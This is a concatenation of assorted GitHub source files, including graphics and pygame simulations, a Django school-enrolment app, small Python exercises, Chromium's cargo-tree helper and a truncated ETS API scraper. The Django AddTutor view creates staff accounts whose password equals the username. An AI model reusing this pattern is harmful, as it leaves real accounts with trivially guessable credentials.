z) : \",end='')\n ref_point = tuple(map(int,input().split()))\n print(\"Enter normal to the plane(n1 space n2 space n3) : \",end=\"\")\n normal = tuple(map(int,input().split()))\n print(\"Enter the COP(x space y space z) : \",end=\"\")\n cop = tuple(map(int,input().split()))\n p_mat = project_matrix_perspective(ref_point,normal,cop)\n\n q_mat = make_viewplane_xy(ref_point,normal)\n for i in range(12):\n point1 = points[i][0]\n point2 = points[i][1]\n point1 = matrix_multiply(point1,p_mat)\n point2 = matrix_multiply(point2,p_mat)\n # Homogenize the points again\n if(point1[3] != 1):\n point1[0] = point1[0]/point1[3]\n point1[1] = point1[1]/point1[3]\n point1[2] = point1[2]/point1[3]\n point1[3] = 1\n if(point2[3] != 1):\n point2[0] = point2[0]/point2[3]\n point2[1] = point2[1]/point2[3]\n point2[2] = point2[2]/point2[3]\n point2[3] = 1\n point1 = matrix_multiply(point1,q_mat)\n point2 = matrix_multiply(point2,q_mat)\n points[i][0] = point1\n points[i][1] = point2\n\n for i in range(12):\n point1 = points[i][0]\n point2 = points[i][1]\n x0 = point1[0] ; y0 = point1[1]\n x1 = point2[0] ; y1 = point2[1]\n plotLine(x0,y0,x1,y1,window,viewport,win,\"black\")\n\n win.getMouse()\n win.close()\n\nif __name__ == '__main__':\n main()\n","repo_name":"ayushjain99/CG_Lab","sub_path":"Assign_4/program.py","file_name":"program.py","file_ext":"py","file_size_in_byte":6907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37038700968","text":"import sys\nimport pygame as pg\nfrom settings import *\nimport numpy as np\nimport math\nimport osm_open\n\n\nclass Clock:\n \"\"\"The clock class contains game time.\"\"\"\n def __init__(self):\n # Create clock and time variables.\n self.clock = pg.time.Clock()\n self.delta_time = 0\n self.irl_time = 0\n self.resource_time = 0\n\nclass Main:\n def __init__(self):\n # initialize Pygame\n pg.init()\n pg.display.set_caption(GAME_TITLE) # Program title\n self.screen = pg.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n self.is_shift_pressed = False\n self.clock = Clock()\n self.map = osm_open.Map()\n self.buildings = self.map.get_buildings()\n self.roads = self.map.get_roads()\n self.nodes = self.map.get_nodes()\n self.lte_cells = self.map.get_grids()\n\n self.generate_agents()\n\n def generate_agents(self):\n agent_speed = 1 \n\n agent_x = []\n agent_y = []\n num_agents = 0\n for x, y in self.nodes:\n if 0 < x < SCREEN_WIDTH-1 and 0 < y < SCREEN_HEIGHT-1:\n agent_x.append(x)\n agent_y.append(y)\n num_agents += 1\n\n\n # create array of random agent locations\n # agent_x = np.random.randint(0, SCREEN_WIDTH-1, size=num_agents)\n # agent_y = np.random.randint(0, SCREEN_HEIGHT-1, size=num_agents)\n\n # create array of random agent directions\n agent_direction = np.random.uniform(0, 2 * math.pi, size=num_agents)\n\n # create array of random agent speeds\n agent_dx = agent_speed * np.cos(agent_direction)\n agent_dy = agent_speed * np.sin(agent_direction)\n\n # combine agent properties into 2D array\n self.agents = np.column_stack((agent_x, agent_y, agent_dx, agent_dy))\n\n # set up block size\n self.num_blocks_x = self.map.grid_width # map_width // block_width\n self.num_blocks_y = self.map.grid_height # map_height // block_height\n self.block_width = SCREEN_WIDTH / self.num_blocks_x\n self.block_height = SCREEN_HEIGHT / self.num_blocks_y\n # create grid of zeros\n self.grid_count = np.zeros((self.num_blocks_y, self.num_blocks_x), dtype=int)\n\n \n def run(self):\n while True:\n self.events()\n self.update()\n self.draw()\n\n def update_clock(self):\n \"\"\"Updates all the time variables in the game.\"\"\"\n self.clock.delta_time = self.clock.clock.tick(FPS) / 1000\n self.clock.irl_time += self.clock.delta_time\n self.clock.resource_time += RESOURCE_TICK\n\n # ================================================= User Events ================================================ #\n def events(self):\n \"\"\"Catches all events here and calls appropriate function.\"\"\"\n for event in pg.event.get():\n if event.type == pg.QUIT:\n self.exit_game()\n elif event.type == pg.KEYDOWN and event.key == pg.K_LSHIFT:\n self.is_shift_pressed = True\n elif event.type == pg.KEYUP and event.key == pg.K_LSHIFT:\n self.is_shift_pressed = False\n\n def update(self):\n self.update_clock()\n # update agent locations\n self.agents[:, 0] += self.agents[:, 2]\n self.agents[:, 1] += self.agents[:, 3]\n \n self.agents[self.agents[:, 0] < 0][:, 0] = 0\n self.agents[self.agents[:, 0] > SCREEN_WIDTH-1][:, 0] = SCREEN_WIDTH-1\n self.agents[self.agents[:, 1] < 0][:, 1] = 0\n self.agents[self.agents[:, 1] > SCREEN_HEIGHT-1][:, 1] = SCREEN_HEIGHT-1\n\n # check for agents going out of bounds\n out_of_bounds = (self.agents[:, 0] <= 0) | (self.agents[:, 0] >= SCREEN_WIDTH-1) | \\\n (self.agents[:, 1] <= 0) | (self.agents[:, 1] >= SCREEN_HEIGHT-1)\n self.agents[out_of_bounds, 2] *= -1 # invert the x velocity of out-of-bounds agents\n self.agents[out_of_bounds, 3] *= -1 # invert the y velocity of out-of-bounds agents\n # clear grid\n self.grid_count.fill(0)\n \n # update grid with agent positions\n grid_x = (self.agents[:, 0] / self.block_width).astype(int)\n grid_y = (self.agents[:, 1] / self.block_height).astype(int)\n np.add.at(self.grid_count, (grid_y, grid_x), 1)\n \n\n def draw_buildings(self):\n for vertices in self.buildings:\n pg.draw.polygon(self.screen, RED, vertices)\n\n for vertices in self.roads:\n for i in range(len(vertices)-1):\n pg.draw.line(self.screen, LIGHTGREY, vertices[i], vertices[i+1])\n\n for x, y in self.nodes:\n pg.draw.circle(self.screen, LIGHTGREY, (x, y), 2, 0)\n # pg.draw.line(self.screen, LIGHTGREY, vertices[i], vertices[i+1])\n\n for vertices in self.lte_cells:\n pg.draw.line(self.screen, LIGHTGREY, vertices[0], vertices[1])\n pg.draw.line(self.screen, LIGHTGREY, vertices[1], vertices[2])\n pg.draw.line(self.screen, LIGHTGREY, vertices[2], vertices[3])\n pg.draw.line(self.screen, LIGHTGREY, vertices[3], vertices[0])\n\n def draw_roads(self):\n pass\n \n def draw_agents(self):\n for x, y, dx, dy in self.agents:\n pg.draw.circle(self.screen, GREEN, (x, y), 5, 0)\n\n def draw_grid(self):\n # calculate number of blocks that fit within map size\n font = pg.font.Font(None, int(min(self.block_height, self.block_width)*0.8))\n if True or self.is_shift_pressed:\n for y in range(self.grid_count.shape[0]):\n for x in range(self.grid_count.shape[1]):\n rect_x = x*self.block_width\n rect_y = y*self.block_height\n text = font.render(f\"{self.grid_count[y, x]}\", True, WHITE)\n # get dimensions of text surface\n text_width = text.get_width()\n text_height = text.get_height()\n\n # calculate dimensions of rectangle\n rect_width = text_width + 20\n rect_height = text_height + 20\n self.screen.blit(text, (rect_x+2, rect_y+2))\n\n # create rectangle surface\n # rect_surface = pg.Surface((rect_width, rect_height))\n # rect_surface.fill(BLUE)\n\n # draw text onto rectangle surface\n #rect_surface.blit(text, ((rect_width - text_width / 2), (rect_height - text_height / 2)))\n # rect_surface.blit(text, (10, 10))\n\n\n #pg.draw.rect(self.screen, BLUE, (rect_x, rect_y, rect_width, rect_height))\n\n # self.screen.blit(rect_surface, (rect_x+2, rect_y+2))\n\n \n\n\n def draw(self):\n \"\"\"This draws everything onto screen.\"\"\"\n # Draws first --> last\n self.screen.fill(BGCOLOR)\n\n self.draw_buildings()\n self.draw_roads()\n self.draw_agents()\n self.draw_grid()\n\n\n\n\n\n pg.display.flip()\n\n def exit_game(self):\n \"\"\"Quits game.\"\"\"\n pg.quit()\n sys.exit()\n\n # def draw_grid(self):\n # \"\"\"Draws the grid locked to map. Tile size multiplied to reduce clutter.\"\"\"\n # for x in range(-self.player.rect[0], SCREEN_WIDTH, int(TILESIZE/2)):\n # pg.draw.line(self.screen, LIGHTGREY, (x, 0), (x, SCREEN_HEIGHT))\n # for y in range(-self.player.rect[1], SCREEN_HEIGHT, int(TILESIZE/2)):\n # pg.draw.line(self.screen, LIGHTGREY, (0, y), (SCREEN_WIDTH, y))\n\n\n# Creates and runs game class.\ngame = Main()\n#game.new()\ngame.run()\n","repo_name":"SuminHan/OD-astar","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5691348264","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.homePage, name=\"home\"),\n path('about/', views.aboutPage, name=\"about\"),\n path('create-link/', views.createLinkPage, name=\"links\"),\n # path('link//', views.RedirectPage.as_view(), name='redirect-link')\n path('link//', views.redirectPage, name=\"redirect-link\")\n]","repo_name":"Roman-Trebis/MyShortUrlOnDjango","sub_path":"MyShortUrl/sokratim/website/main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34541654750","text":"# -*- encoding: utf-8 -*-\n\nfrom datetime import datetime\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth.models import User\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.views.generic.base import TemplateView\nfrom direction.models import (Alumno, PadreTutor)\nfrom school.utils import (FormCreator, Commonds)\nfrom django import forms\n\nFIELDS_ALUMNO = ['nombre', 'apaterno', 'amaterno', 'genero', 'curp', 'nacimiento', 'tipo_desangre', 'alergias']\nFIELDS_TUTOR = ['nombre_completo','edad','folio']\nFORM = FormCreator()\n\n#class Home(LoginRequiredMixin, TemplateView):\nclass Home(TemplateView):\n #login_url = '/direccion/login/'\n def get(self, request):\n context = {}\n return render(request, 'direction/index.html', context)\n\nclass Login(TemplateView):\n template_name = \"login.html\"\n\n def get(self, request):\n context = {}\n \n return render(request, 'direction/login.html', context)\n\nclass Inscripcion(TemplateView):\n #login_url = '/direccion/login/'\n modelos = [Alumno,PadreTutor]\n fields = {'alumno':FIELDS_ALUMNO, 'tutor':FIELDS_TUTOR}\n general_form = FormCreator()\n widgets_alumno = {\n 'nacimiento': forms.TextInput(attrs={'type':'date',\n 'class':'form-control'}),\n }\n\n def format_form(self, fields, forma):\n for l in fields:\n label = forma.base_fields.get(l).label\n forma.base_fields.get(l).widget.attrs={'class':'form-control',\n 'placeholder':label\n }\n\n def gen_folio(self):\n d = datetime.now()\n folio = '%s%s%s%s%s%s'%(str(d.year)[:2], \n d.month, \n d.day, \n d.hour, \n d.minute, \n d.second)\n folio = int(folio)\n folio = hex(folio).upper()\n return folio\n\n def post(self, request):\n data = request.POST.copy()\n paso=int(data['step'])\n pk = data.get('id',None)\n instanced = None\n folio = 0\n if len(pk)>0:\n instanced = Alumno.objects.get(id=pk)\n pasos = [self.fields['alumno'],self.fields['tutor']]\n modelo = self.modelos[paso]\n campos = pasos[paso]\n form = self.general_form.form_to_model(modelo=modelo,fields=campos)\n form = form(data, instance=instanced)\n if form.is_valid():\n f = form.save()\n if paso==0 and not instanced:\n f.folio = self.gen_folio()\n f.save()\n\n response = {'id':f.id, 'folio':f.folio}\n return JsonResponse(response)\n else:\n response = {'errors':form.errors.get_json_data()}\n return JsonResponse(response)\n\n\n def get(self, request):\n context = {}\n form_alumno = self.general_form.form_to_model(modelo=Alumno, \n excludes=[], \n widgets=self.widgets_alumno)\n self.format_form(self.fields['alumno'], form_alumno) \n form_tutor = self.general_form.form_to_model(modelo=PadreTutor, \n fields=self.fields['tutor'])\n\n self.format_form(self.fields['tutor'], form_tutor) \n context['form_alumno'] = form_alumno\n context['form_tutor'] = form_tutor\n return render(request, 'direction/inscripcion.html', context)\n\nclass AddTutor(TemplateView, Commonds):\n def post(self, request):\n context = {}\n data = request.POST.copy()\n instanced = None\n try:\n idp = request.POST.get('id_parent')\n instanced = PadreTutor.objects.get(pk=idp)\n data['folio'] = instanced.folio\n except:\n data['folio'] = self.gen_folio()\n form = FORM.form_to_model(modelo=PadreTutor, excludes=[])\n form = form(data, instance=instanced)\n if form.is_valid():\n if not instanced:\n user = User.objects.create_user(username=data['folio'],\n email='%s@cendipiaget.com'%(data['folio']),\n is_staff=True,\n password=data['folio'])\n f = form.save()\n callbacks = ['activate_paso_dos',]\n response = {'id':f.id, 'folio':f.folio, 'callbacks':callbacks}\n return JsonResponse(response)\n else:\n response = {'errors':form.errors.get_json_data()}\n return JsonResponse(response)\n\nclass AddAlumno(TemplateView, Commonds):\n def post(self, request):\n context = {}\n data = request.POST.copy()\n data['folio'] = self.gen_folio()\n instanced = None\n form = FORM.form_to_model(modelo=Alumno, excludes=[])\n form = form(data, instance=instanced)\n if form.is_valid():\n f = form.save()\n f.foto = request.FILES.get('foto')\n f.save()\n callbacks = ['activate_paso_tres',]\n response = {'id':f.id, 'folio':f.folio, 'callbacks':callbacks}\n return JsonResponse(response)\n else:\n response = {'errors':form.errors.get_json_data()}\n return JsonResponse(response)\n","repo_name":"atomychouse/cendi","sub_path":"direction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"37787634710","text":"import pandas as pd\n\ndataset = pd.read_csv(\"C:/dataset/2013_pakistan_eq_temp.csv\", header=0)\n\nrelevant_labels = (\"caution_and_advice\", \"displaced_people_and_evacuations\", \"infrastructure_and_utilities_damage\",\n \"injured_or_dead_people\", \"missing_trapped_or_found_people\", \"other_useful_information\")\n\ndataset = dataset[~dataset[\"Label\"].isin(relevant_labels)]\n\ndataset = dataset.set_index(\"TweetID\")\n\ncol_names = list(dataset.columns.values)\n\ndataset.to_csv(\"C:/dataset/2013_pakistan_eq_irrelevant.csv\",\n header=col_names, index=True, sep=',', mode='w')\n","repo_name":"FVerg/crisis-tweet-classifier","sub_path":"irrelevant_tweets.py","file_name":"irrelevant_tweets.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"12770266186","text":"import os\nimport re\nfrom difflib import SequenceMatcher\nfrom itertools import product\nfrom urllib.request import urlretrieve\n\n# prep\nTAG_HTML = re.compile(r'([^<]+)')\nTEMPFILE = os.path.join('tmp', 'feed')\nMIN_TAG_LEN = 10\nIDENTICAL = 1.0\nSIMILAR = 0.95\n\nurlretrieve('http://bit.ly/2zD8d8b', TEMPFILE)\n\n\ndef _get_tags(tempfile=TEMPFILE):\n \"\"\"Helper to parse all tags from a static copy of PyBites' feed,\n providing this here so you can focus on difflib\"\"\"\n with open(tempfile) as f:\n content = f.read().lower()\n # take a small subset to keep it performant\n tags = TAG_HTML.findall(content)\n tags = [tag for tag in tags if len(tag) > MIN_TAG_LEN]\n return set(tags)\n\n\ndef get_similarities(tags=None):\n \"\"\"Should return a list of similar tag pairs (tuples)\"\"\"\n tags = tags or _get_tags()\n pairs = [(x, y) for x, y in list(product(tags, tags, repeat=1)) if x != y]\n good_pairs = []\n for pair in pairs:\n if SequenceMatcher(None, pair[0],pair[1]).ratio() > SIMILAR:\n good_pairs.append(pair)\n return good_pairs\nprint(get_similarities())","repo_name":"AlterFritz88/pybits","sub_path":"bite23.py","file_name":"bite23.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"4572318936","text":"import json\r\nimport os\r\nimport difflib \r\npath = '\\\\Users\\\\pc\\\\Desktop'\r\nos.chdir(path)\r\ndata = json.load(open('data.json'))\r\n\r\n\r\ndef translate(word):\r\n word_matched = difflib.get_close_matches(word , data.keys())\r\n word = word.lower()\r\n if word in data:\r\n return data[word]\r\n elif word.title() in data: \r\n return data[word.title()]\r\n if word.upper() in data:\r\n return data[word.upper()]\r\n elif len(word_matched) > 0:\r\n yn = input(\"Did you mean %s instead , Enter Y or N\" % word_matched[0])\r\n if yn == 'Y':\r\n return data[word_matched[0]]\r\n elif yn == 'N':\r\n return('this word does not exist')\r\n \r\n else:\r\n return('this word does not exist')\r\n \r\n\r\nword = input('enter a word:')\r\n\r\noutput =translate(word)\r\n\r\n\r\nif type(output) == list:\r\n for item in output:\r\n print(item)\r\nelse:\r\n print(output)\r\n","repo_name":"depo-egy/Python-Projects","sub_path":"Python_Dictionary/app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9868565873","text":"\r\nimport random\r\nrandomnumber=random.randint(1,100)\r\n#print(randomnumber)\r\nb=None\r\nguesses=0\r\nwhile (b!=randomnumber):\r\n b=int(input(\"please enter your guess number from 1 to 100: \"))\r\n\r\n\r\n if int(randomnumber==b):\r\n print(\"finally, yours guess is right👏👏🌹\")\r\n print(f\"you gussed it right in {guesses} times\")\r\n\r\n else:\r\n print('try again')\r\n if (randomnumber)>b:\r\n print(\"higher number please\")\r\n guesses +=1\r\n elif (randomnumber str:\n return \"CrateKey({} v{})\".format(self.name, self.epoch)\n\n def __eq__(self, other: object) -> bool:\n if not isinstance(other, CrateKey):\n return NotImplemented\n return self.name == other.name and self.epoch == other.epoch\n\n def __hash__(self) -> int:\n return hash(\"{}: {}\".format(self.name, self.epoch))\n\n\nclass CrateUsage(Enum):\n \"\"\"The ways that a crate's library can be used from other crates.\"\"\"\n FOR_NORMAL = 1, # Used from another crate's lib/binary outputs.\n FOR_BUILDRS = 2, # Used from another crates's build.rs.\n FOR_TESTS = 3, # Used from another crate's tests.\n\n def gn_target_name(self) -> str:\n \"\"\"The name to use for a gn target.\n\n This is the name of the target used for generating the target in the\n BUILD.gn file. The name is based on how the target will be used, since\n crates have different features enabled when being built for use in\n tests, or for use from a build.rs build script.\"\"\"\n if self == CrateUsage.FOR_NORMAL:\n return CrateBuildOutput.NORMAL.gn_target_name_for_dep()\n elif self == CrateUsage.FOR_BUILDRS:\n return CrateBuildOutput.BUILDRS.gn_target_name_for_dep()\n elif self == CrateUsage.FOR_TESTS:\n return CrateBuildOutput.TESTS.gn_target_name_for_dep()\n else:\n return NotImplemented\n\n\nclass CrateBuildOutput(Enum):\n \"\"\"The various build outputs when building a crate.\"\"\"\n NORMAL = 1 # Building the crate's normal output.\n BUILDRS = 2 # Building the crate's build.rs.\n TESTS = 3 # Building the crate's tests.\n\n def as_dep_usage(self) -> CrateUsage:\n if self == CrateBuildOutput.NORMAL:\n return CrateUsage.FOR_NORMAL\n elif self == CrateBuildOutput.BUILDRS:\n return CrateUsage.FOR_BUILDRS\n elif self == CrateBuildOutput.TESTS:\n return CrateUsage.FOR_TESTS\n else:\n assert False # Unhandled CrateBuildOutput?\n\n def gn_target_name_for_dep(self):\n \"\"\"The name to use for gn dependency targets.\n\n This is the name of the target to use for a dependency in the `deps`,\n `build_deps`, or `dev_deps` section of a BUILD.gn target. The name\n depends on what kind of dependency it is, since crates have different\n features enabled when being built for use in tests, or for use from a\n build.rs build script.\"\"\"\n if self == CrateBuildOutput.NORMAL:\n return \"lib\"\n if self == CrateBuildOutput.BUILDRS:\n return \"buildrs_support\"\n if self == CrateBuildOutput.TESTS:\n return \"test_support\"\n\n def _cargo_tree_edges(self) -> str:\n \"\"\"Get the argument for `cargo tree --edges`\n\n Returns what to pass to the --edges argument when running `cargo tree`\n to see the dependencies of a given build output.\"\"\"\n if self == CrateBuildOutput.NORMAL:\n return \"normal\"\n elif self == CrateBuildOutput.BUILDRS:\n return \"build\"\n elif self == CrateBuildOutput.TESTS:\n return \"dev\"\n else:\n return NotImplemented\n\n\ndef run_cargo_tree(path: str, build: CrateBuildOutput,\n target_arch: Optional[str], depth: Optional[int],\n features: list) -> list[str]:\n \"\"\"Runs `cargo tree` on the Cargo.toml file at `path`.\n\n Note that `cargo tree` actually invokes `rustc` a bunch to collect its\n output, but it does not appear to actually compile anything. Additionally,\n we are running `cargo tree` in a temp directory with placeholder rust files\n present to satisfy `cargo tree`, so no source code from crates.io should\n be compiled, or run, by this tool.\n\n Args:\n target_arch: one of the ALL_RUSTC_ARCH which are targets understood by\n rustc, and shown by `rustc --print target-list`. Or none, in which\n case the current machine's architecture is used.\n\n Returns:\n The output of cargo tree, with split by lines into a list.\n \"\"\"\n tree_cmd = [\n \"cargo\",\n \"tree\",\n \"--manifest-path\",\n path,\n \"--edges\",\n build._cargo_tree_edges(),\n \"--format={p} {f}\",\n \"-v\",\n ]\n if target_arch:\n tree_cmd += [\"--target\", target_arch]\n if depth is not None:\n tree_cmd += [\"--depth\", str(depth)]\n if \"default\" not in features:\n tree_cmd += [\"--no-default-features\"]\n features = [f for f in features if not f == \"default\"]\n if features:\n tree_cmd += [\"--features\", \",\".join(features)]\n try:\n r = subprocess.check_output(tree_cmd, text=True, stderr=subprocess.PIPE)\n except subprocess.CalledProcessError as e:\n print()\n print(' '.join(tree_cmd))\n print(e.stderr)\n raise e\n return r.splitlines()\n\n\ndef add_required_cargo_fields(toml_3p):\n \"\"\"Add required fields for a Cargo.toml to be parsed by `cargo tree`.\"\"\"\n toml_3p[\"package\"] = {\n \"name\": \"chromium\",\n \"version\": \"1.0.0\",\n }\n return toml_3p\n\n\nclass ListOf3pCargoToml:\n \"\"\"A typesafe cache of info about local third-party Cargo.toml files.\"\"\"\n\n class CargoToml:\n def __init__(self, name: str, epoch: str, path: str):\n self.name = name\n self.epoch = epoch\n self.path = path\n\n def __init__(self, list_of: list[CargoToml]):\n self._list_of = list_of\n\n\ndef write_cargo_toml_in_tempdir(\n dir: str,\n all_3p_tomls: ListOf3pCargoToml,\n orig_toml_parsed: Optional[dict[str, Any]] = None,\n orig_toml_path: Optional[str] = None,\n verbose: bool = False) -> str:\n \"\"\"Write a temporary Cargo.toml file that will work with `cargo tree`.\n\n Creates a copy of a Cargo.toml, specified in `orig_toml_path`, in to the\n temp directory specified by `dir` and sets up the temp dir so that running\n `cargo` will succeed. Also points all crates named in `all_3p_tomls` to\n the downloaded versions.\n\n Exactly one of `orig_toml_parsed` or `orig_toml_path` must be specified.\n\n Args:\n dir: An OS path to a temp directory where the Cargo.toml file is to be\n written.\n all_3p_tomls: A cache of local third-party Cargo.toml files, crated by\n gen_list_of_3p_cargo_toml(). The generated Cargo.toml will be patched\n to point `cargo tree` to local Cargo.tomls for dependencies in order\n to see local changes.\n orig_toml_parsed: The Cargo.toml file contents to write, as a\n dictionary.\n orig_toml_path: An OS path to the Cargo.toml file which should be copied\n into the output Cargo.toml.\n verbose: Whether to print verbose output, including the full TOML\n content.\n\n Returns:\n The OS path to the output Cargo.toml file in `dir`, for convenience.\n \"\"\"\n assert bool(orig_toml_parsed) ^ bool(orig_toml_path)\n orig_toml_text: Optional[str] = None\n if orig_toml_path:\n with open(orig_toml_path, \"r\") as f:\n orig_toml_text = f.read()\n orig_toml_parsed = dict(toml.loads(orig_toml_text))\n\n # This assertion is necessary for type checking. Now mypy deduces\n # orig_toml_parsed's type as dict[str, Any] instead of Optional[...]\n assert orig_toml_parsed is not None\n\n orig_name = orig_toml_parsed[\"package\"][\"name\"]\n orig_epoch = common.version_epoch_dots(\n orig_toml_parsed[\"package\"][\"version\"])\n\n if all_3p_tomls is None:\n all_3p_tomls = ListOf3pCargoToml([])\n\n # Since we're putting a Cargo.toml in a temp dir, cargo won't be\n # able to find the src/lib.rs and will bail out, so we make it.\n os.mkdir(os.path.join(dir, \"src\"))\n with open(os.path.join(dir, \"src\", \"lib.rs\"), mode=\"w\") as f:\n f.write(\"lib.rs\")\n # Same thing for build.rs, as some Cargo.toml flags make it go looking\n # for a build script to verify it exists.\n if not \"build\" in orig_toml_parsed[\"package\"]:\n with open(os.path.join(dir, \"build.rs\"), mode=\"w\") as f:\n f.write(\"build.rs\")\n # And [[bin]] targets, if they have a name but no path, expect to\n # find a file at src/bin/%name%.rs or at src/main.rs, though when\n # one is preferred is unclear. It seems to always work with the\n # former one though, but not always with the latter.\n if \"bin\" in orig_toml_parsed:\n os.mkdir(os.path.join(dir, \"src\", \"bin\"))\n for bin in orig_toml_parsed[\"bin\"]:\n if \"path\" not in bin and \"name\" in bin:\n with open(os.path.join(dir, \"src\", \"bin\",\n \"{}.rs\".format(bin[\"name\"])),\n mode=\"w\") as f:\n f.write(\"bin main.rs\")\n # Workspaces in a crate's Cargo.toml need to point to other Cargo.toml files\n # on disk, and those Cargo.toml files require a lib or binary source as\n # well. We don't support building workspaces, but cargo will die if it can't\n # find them.\n if \"workspace\" in orig_toml_parsed:\n for m in orig_toml_parsed[\"workspace\"].get(\"members\", []):\n workspace_dir = os.path.join(dir, *(m.split(\"/\")))\n os.makedirs(workspace_dir)\n with open(os.path.join(workspace_dir, \"Cargo.toml\"), mode=\"w\") as f:\n f.write(consts.FAKE_EMPTY_CARGO_TOML)\n bin_dir = os.path.join(workspace_dir, \"src\", \"bin\")\n os.makedirs(bin_dir)\n with open(os.path.join(bin_dir, \"main.rs\"), mode=\"w\") as f:\n f.write(\"workspace {} bin main.rs\".format(m))\n\n # Generate a patch that points the current crate, to the temp dir, and all\n # others to `consts.THIRD_PARTY`. This is to deal with build/dev deps that\n # transitively depend back on the current crate. Otherwise it gets seen in\n # 2 paths.\n patch: dict[str, Any] = {\"patch\": {\"crates-io\": {}}}\n cwd = os.getcwd()\n for in_3p in all_3p_tomls._list_of:\n if in_3p.name == orig_name and in_3p.epoch == orig_epoch:\n # If this is the crate we're creating a temp Cargo.toml for, point\n # the patch to the temp dir.\n abspath = dir\n else:\n # Otherwise, point the patch to the downloaded third-party crate's\n # dir.\n abspath = os.path.join(cwd, in_3p.path)\n patch_name = (\"{}_v{}\".format(\n in_3p.name, common.version_epoch_normalized(in_3p.epoch)))\n patch[\"patch\"][\"crates-io\"][patch_name] = {\n \"version\": in_3p.epoch,\n \"path\": abspath,\n \"package\": in_3p.name,\n }\n\n tmp_cargo_toml_path = os.path.join(dir, \"Cargo.toml\")\n # This is the third-party Cargo.toml file. Note that we do not write\n # the `orig_toml_parsed` as the python parser does not like the contents\n # of some Cargo.toml files that cargo is just fine with. So we write the\n # contents without a round trip through the parser.\n if orig_toml_text:\n cargo_toml_text = orig_toml_text\n else:\n cargo_toml_text = toml.dumps(orig_toml_parsed)\n # We attach our \"patch\" keys onto it to redirect all crates.io\n # dependencies into `consts.THIRD_PARTY`.\n cargo_toml_text = cargo_toml_text + toml.dumps(patch)\n # Generate our own (temp) copy of a Cargo.toml for the dependency\n # that we will run `cargo tree` against.\n with open(tmp_cargo_toml_path, mode=\"w\") as tmp_cargo_toml:\n tmp_cargo_toml.write(cargo_toml_text)\n if verbose:\n print(\"Writing to %s:\" % tmp_cargo_toml_path)\n print(\"=======\")\n print(cargo_toml_text)\n print(\"=======\")\n\n return tmp_cargo_toml_path\n\n\ndef gen_list_of_3p_cargo_toml() -> ListOf3pCargoToml:\n \"\"\"Create a cached view of existing third-party crates.\n\n Find all the third-party crates present and cache them for generating\n Cargo.toml files in temp dirs that will point to them.\"\"\"\n list_of: list[ListOf3pCargoToml.CargoToml] = []\n for normalized_crate_name in os.listdir(common.os_third_party_dir()):\n crate_dir = common.os_crate_name_dir(normalized_crate_name)\n if not os.path.isdir(crate_dir):\n continue\n for v_epoch in os.listdir(crate_dir):\n epoch = v_epoch.replace(\"v\", \"\").replace(\"_\", \".\")\n filepath = common.os_crate_cargo_dir(normalized_crate_name,\n epoch,\n rel_path=[\"Cargo.toml\"])\n if os.path.exists(filepath):\n cargo_toml = toml.load(filepath)\n # Note this can't use the directory name because it was\n # normalized, so we read the real name from the Cargo.toml.\n name = cargo_toml[\"package\"][\"name\"]\n assert common.crate_name_normalized(\n name) == normalized_crate_name\n # The version epoch comes from the directory name.\n list_of += [\n ListOf3pCargoToml.CargoToml(\n name, epoch,\n common.os_crate_cargo_dir(normalized_crate_name, epoch))\n ]\n return ListOf3pCargoToml(list_of)\n","repo_name":"react-native-skia/react-native-skia","sub_path":"tools/crates/lib/cargo.py","file_name":"cargo.py","file_ext":"py","file_size_in_byte":13832,"program_lang":"python","lang":"en","doc_type":"code","stars":901,"dataset":"github-code","pt":"83"} +{"seq_id":"28119508318","text":"import json\nimport aiohttp\nimport requests\nimport asyncio\nimport time\nfrom datetime import datetime\n\nfrom ets_data import token_get\nfrom db2 import data_get\nfrom db2 import data_post\nfrom db2 import data_delete\nimport settings\n\n\ndata = []\ndata_cars = {}\ntokens = {}\n\n\nasync def car_action(username, token):\n data_car = []\n url = 'https://ets.mos.ru/services/car_actual'\n headers = {\n 'Authorization': token,\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'\n }\n car = requests.get(url, headers=headers)\n data_full = json.loads(car.text)\n data_result = data_full['result']['rows']\n for x in data_result:\n if x['waybill_closing_date'] is None:\n continue\n else:\n date1 = datetime.strptime(str(x['waybill_closing_date']), \"%Y-%m-%dT%H:%M:%S\").strftime(\"%Y-%m-%d\")\n data_car.append((x['asuods_id'], x['gov_number'], date1, x['okrug_name'], x['company_name'], x['level_sensors_num'], x['gps_code']))\n\n data_cars[username] = data_car\n\n\nasync def get_waybill_data(username, token, session, asuods_id, level_sensors_num, gps_code, closing_date):\n url = 'https://ets.mos.ru/services/waybill?limit=1&sort_by=number:desc&filter={\"car_id__in\":[\"' + str(asuods_id) + '\"],\"status__in\":[\"closed\"],\"closing_date__eq\":\"' + str(closing_date) + '\"}'\n headers = {\n 'Authorization': token,\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'\n }\n try:\n async with session.get(url, headers=headers, timeout=600) as resp:\n wb = await resp.json()\n if wb['result'] and isinstance(wb['result'], list):\n waybill = wb['result'][0]\n waybill['level_sensors_num'] = level_sensors_num\n waybill['gps_code'] = gps_code\n return waybill\n else:\n print(f'Нет данных: {username, wb, url}')\n except 